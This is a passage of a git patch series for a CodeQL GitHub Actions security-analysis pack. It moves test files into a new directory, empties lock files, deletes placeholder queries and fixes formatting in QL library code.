diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml
rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
rename to actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref
rename to actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected
rename to actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref
rename to actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected
rename to actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref
rename to actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref
diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
rename to actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref
rename to actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
rename to actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref
rename to actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
rename to actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref
rename to actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected
rename to actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref
rename to actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref
diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected
rename to actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected
diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref
rename to actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref
diff --git a/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
rename to actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
diff --git a/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-918/RequestForgery.expected
rename to actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected
diff --git a/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
rename to actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
diff --git a/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
similarity index 100%
rename from ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
rename to actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
diff --git a/ql/test/query-tests/SyntaxError/SyntaxError.expected b/actions/ql/test/query-tests/SyntaxError/SyntaxError.expected
similarity index 100%
rename from ql/test/query-tests/SyntaxError/SyntaxError.expected
rename to actions/ql/test/query-tests/SyntaxError/SyntaxError.expected
diff --git a/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref
similarity index 100%
rename from ql/test/query-tests/SyntaxError/SyntaxError.qlref
rename to actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref
diff --git a/ql/test/query-tests/SyntaxError/options b/actions/ql/test/query-tests/SyntaxError/options
similarity index 100%
rename from ql/test/query-tests/SyntaxError/options
rename to actions/ql/test/query-tests/SyntaxError/options
diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml
similarity index 100%
rename from ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml
rename to actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml
diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml
similarity index 100%
rename from ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml
rename to actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml
diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected
similarity index 100%
rename from ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected
rename to actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected
diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref
similarity index 100%
rename from ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref
rename to actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref
diff --git a/codeql-workspace.yml b/codeql-workspace.yml
deleted file mode 100644
index f00f92b346f9..000000000000
--- a/codeql-workspace.yml
+++ /dev/null
@@ -1,4 +0,0 @@
-provide:
- - "**/ql/src/qlpack.yml"
- - "**/ql/lib/qlpack.yml"
- - "**/ql/test/qlpack.yml"
From c7efe5d0f5d7735237dbef1290d3510a92ff257e Mon Sep 17 00:00:00 2001
From: Dave Bartolomeo Date: Wed, 18 Dec 2024 14:42:13 -0500 Subject: [PATCH 696/707] Update lock files --- actions/ql/lib/codeql-pack.lock.yml | 26 +------------------------- actions/ql/src/codeql-pack.lock.yml | 26 +------------------------- actions/ql/test/codeql-pack.lock.yml | 26 +------------------------- 3 files changed, 3 insertions(+), 75 deletions(-) diff --git a/actions/ql/lib/codeql-pack.lock.yml b/actions/ql/lib/codeql-pack.lock.yml index 2f4b6f858370..53004274575d 100644 --- a/actions/ql/lib/codeql-pack.lock.yml +++ b/actions/ql/lib/codeql-pack.lock.yml @@ -1,28 +1,4 @@ --- lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 1.0.12 - codeql/dataflow: - version: 1.1.6 - codeql/javascript-all: - version: 2.1.1 - codeql/mad: - version: 1.0.12 - codeql/regex: - version: 1.0.12 - codeql/ssa: - version: 1.0.12 - codeql/threat-models: - version: 1.0.12 - codeql/tutorial: - version: 1.0.12 - codeql/typetracking: - version: 1.0.12 - codeql/util: - version: 1.0.12 - codeql/xml: - version: 1.0.12 - codeql/yaml: - version: 1.0.12 +dependencies: {} compiled: false diff --git a/actions/ql/src/codeql-pack.lock.yml b/actions/ql/src/codeql-pack.lock.yml index 2f4b6f858370..53004274575d 100644 --- a/actions/ql/src/codeql-pack.lock.yml +++ b/actions/ql/src/codeql-pack.lock.yml @@ -1,28 +1,4 @@ --- lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 1.0.12 - codeql/dataflow: - version: 1.1.6 - codeql/javascript-all: - version: 2.1.1 - codeql/mad: - version: 1.0.12 - codeql/regex: - version: 1.0.12 - codeql/ssa: - version: 1.0.12 - codeql/threat-models: - version: 1.0.12 - codeql/tutorial: - version: 1.0.12 - codeql/typetracking: - version: 1.0.12 - codeql/util: - version: 1.0.12 - codeql/xml: - version: 1.0.12 - codeql/yaml: - version: 1.0.12 +dependencies: {} compiled: false diff --git a/actions/ql/test/codeql-pack.lock.yml b/actions/ql/test/codeql-pack.lock.yml index 2f4b6f858370..53004274575d 100644 
--- a/actions/ql/test/codeql-pack.lock.yml +++ b/actions/ql/test/codeql-pack.lock.yml @@ -1,28 +1,4 @@ --- lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 1.0.12 - codeql/dataflow: - version: 1.1.6 - codeql/javascript-all: - version: 2.1.1 - codeql/mad: - version: 1.0.12 - codeql/regex: - version: 1.0.12 - codeql/ssa: - version: 1.0.12 - codeql/threat-models: - version: 1.0.12 - codeql/tutorial: - version: 1.0.12 - codeql/typetracking: - version: 1.0.12 - codeql/util: - version: 1.0.12 - codeql/xml: - version: 1.0.12 - codeql/yaml: - version: 1.0.12 +dependencies: {} compiled: false From 47e364a13b917e3ee2caeba1f6e36b13d1725913 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 14:51:24 -0500 Subject: [PATCH 697/707] Remove placeholder code --- actions/ql/src/Placeholder.ql | 16 ------------- .../test/library-tests/Placeholder.expected | 1 - actions/ql/test/library-tests/Placeholder.ql | 1 - .../Placeholder/.github/workflows/shell.yml | 23 ------------------- .../Placeholder/Placeholder.expected | 1 - .../query-tests/Placeholder/Placeholder.qlref | 1 - 6 files changed, 43 deletions(-) delete mode 100644 actions/ql/src/Placeholder.ql delete mode 100644 actions/ql/test/library-tests/Placeholder.expected delete mode 100644 actions/ql/test/library-tests/Placeholder.ql delete mode 100644 actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml delete mode 100644 actions/ql/test/query-tests/Placeholder/Placeholder.expected delete mode 100644 actions/ql/test/query-tests/Placeholder/Placeholder.qlref diff --git a/actions/ql/src/Placeholder.ql b/actions/ql/src/Placeholder.ql deleted file mode 100644 index 63e32f04dfb3..000000000000 --- a/actions/ql/src/Placeholder.ql +++ /dev/null 
@@ -1,16 +0,0 @@ -/** - * @name Placeholder Query - * @description Placeholder - * @kind problem - * @problem.severity warning - * @security-severity 9.3 - * @precision high - * @id actions/placeholder - * @tags actions security - */ - -import actions -import javascript - -from File f -select f, "Analyzed a file." diff --git a/actions/ql/test/library-tests/Placeholder.expected b/actions/ql/test/library-tests/Placeholder.expected deleted file mode 100644 index 2a4f078a25fc..000000000000 --- a/actions/ql/test/library-tests/Placeholder.expected +++ /dev/null @@ -1 +0,0 @@ -| 1 | diff --git a/actions/ql/test/library-tests/Placeholder.ql b/actions/ql/test/library-tests/Placeholder.ql deleted file mode 100644 index 82198eaf87be..000000000000 --- a/actions/ql/test/library-tests/Placeholder.ql +++ /dev/null @@ -1 +0,0 @@ -select 1 diff --git a/actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml b/actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml deleted file mode 100644 index 9392b81c6ab2..000000000000 --- a/actions/ql/test/query-tests/Placeholder/.github/workflows/shell.yml +++ /dev/null @@ -1,23 +0,0 @@ -on: push - -jobs: - job1: - runs-on: ubuntu-latest - steps: - - shell: pwsh - run: Write-Output "foo" - job2: - runs-on: ubuntu-latest - steps: - - run: echo "foo" - - job3: - runs-on: windows-latest - steps: - - shell: bash - run: echo "foo" - job4: - runs-on: windows-latest - steps: - - run: Write-Output "foo" - diff --git a/actions/ql/test/query-tests/Placeholder/Placeholder.expected b/actions/ql/test/query-tests/Placeholder/Placeholder.expected deleted file mode 100644 index 82fd180be661..000000000000 --- a/actions/ql/test/query-tests/Placeholder/Placeholder.expected +++ /dev/null @@ -1 +0,0 @@ -| .github/workflows/shell.yml:0:0:0:0 | .github/workflows/shell.yml | Analyzed a file. | 
diff --git a/actions/ql/test/query-tests/Placeholder/Placeholder.qlref b/actions/ql/test/query-tests/Placeholder/Placeholder.qlref deleted file mode 100644 index 2ad15e688e23..000000000000 --- a/actions/ql/test/query-tests/Placeholder/Placeholder.qlref +++ /dev/null @@ -1 +0,0 @@ -Placeholder.ql From 7891134a87a07cce8167dbd38cce76b689bce4b2 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 15:43:53 -0500 Subject: [PATCH 698/707] Fix formatting --- actions/ql/lib/codeql/actions/Cfg.qll | 1 - actions/ql/lib/codeql/actions/Consistency.ql | 2 - ...efaultableCodeQLInitiatlizeActionQuery.qll | 8 +- .../ql/lib/codeql/actions/config/Config.qll | 6 +- .../actions/config/ConfigExtensions.qll | 4 +- .../actions/ideContextual/IDEContextual.qll | 2 +- .../UseOfUnversionedImmutableAction.qll | 13 ++- .../ql/lib/ide-contextual-queries/printAst.ql | 1 - .../ql/lib/ide-contextual-queries/printCfg.ql | 88 +++++++++---------- .../CWE-829/UnversionedImmutableAction.ql | 5 +- .../CodeQL/UnnecessaryUseOfAdvancedConfig.ql | 2 +- 11 files changed, 58 insertions(+), 74 deletions(-) diff --git a/actions/ql/lib/codeql/actions/Cfg.qll b/actions/ql/lib/codeql/actions/Cfg.qll index df7acf4e1c05..8ccc8de1d445 100644 --- a/actions/ql/lib/codeql/actions/Cfg.qll +++ b/actions/ql/lib/codeql/actions/Cfg.qll @@ -4,4 +4,3 @@ private import codeql.actions.controlflow.internal.Cfg as CfgInternal import CfgInternal::Completion import CfgInternal::CfgScope import CfgInternal::CfgImpl - diff --git a/actions/ql/lib/codeql/actions/Consistency.ql b/actions/ql/lib/codeql/actions/Consistency.ql index fa3a2bc9e5ce..a799ffce3a3a 100644 --- a/actions/ql/lib/codeql/actions/Consistency.ql +++ b/actions/ql/lib/codeql/actions/Consistency.ql @@ -1,3 +1 @@ import DataFlow::DataFlow::Consistency - - 
diff --git a/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll b/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll index ddec858aa62e..9bd9bd34dd44 100644 --- a/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll +++ b/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll @@ -7,9 +7,7 @@ private import actions * uses: github/codeql-action/init@v2 * with: * languages: ruby, javascript - * */ - class DefaultableCodeQLInitiatlizeActionQuery extends UsesStep { DefaultableCodeQLInitiatlizeActionQuery() { this.getCallee() = "github/codeql-action/init" and @@ -17,7 +15,7 @@ class DefaultableCodeQLInitiatlizeActionQuery extends UsesStep { } } -/** +/** * Holds if the with: part of the workflow step contains any arguments for with: other than "languages". * e.g. * - name: Initialize CodeQL @@ -25,12 +23,10 @@ class DefaultableCodeQLInitiatlizeActionQuery extends UsesStep { * with: * languages: ${{ matrix.language }} * config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml - * */ - predicate customizedWorkflowStep(UsesStep codeQLInitStep) { exists(string arg | exists(codeQLInitStep.getArgument(arg)) and arg != "languages" ) -} \ No newline at end of file +} diff --git a/actions/ql/lib/codeql/actions/config/Config.qll b/actions/ql/lib/codeql/actions/config/Config.qll index 20c6fae92731..265d4bd820f8 100644 --- a/actions/ql/lib/codeql/actions/config/Config.qll +++ b/actions/ql/lib/codeql/actions/config/Config.qll @@ -124,11 +124,7 @@ predicate vulnerableActionsDataModel( * Fields: * - action: action name */ -predicate immutableActionsDataModel( - string action -) { - Extensions::immutableActionsDataModel(action) -} +predicate immutableActionsDataModel(string action) { Extensions::immutableActionsDataModel(action) } /** * MaD models for untrusted git commands 
diff --git a/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll b/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll index 7ed1d546dbac..99ad7eb8df1b 100644 --- a/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -61,9 +61,7 @@ extensible predicate vulnerableActionsDataModel( /** * Holds for actions that are known to be immutable. */ -extensible predicate immutableActionsDataModel( - string action -); +extensible predicate immutableActionsDataModel(string action); /** * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch. diff --git a/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll b/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll index 90ce11764b58..0e58b1d878be 100644 --- a/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll +++ b/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll @@ -16,4 +16,4 @@ File getFileBySourceArchiveName(string name) { // We can handle 2 and 3 together by unconditionally adding a leading slash // before replacing double slashes. name = ("/" + result.getAbsolutePath().replaceAll(":", "_")).replaceAll("//", "/") -} \ No newline at end of file +} diff --git a/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll index bd14b6749206..ef258fce2e5c 100644 --- a/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll +++ b/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll 
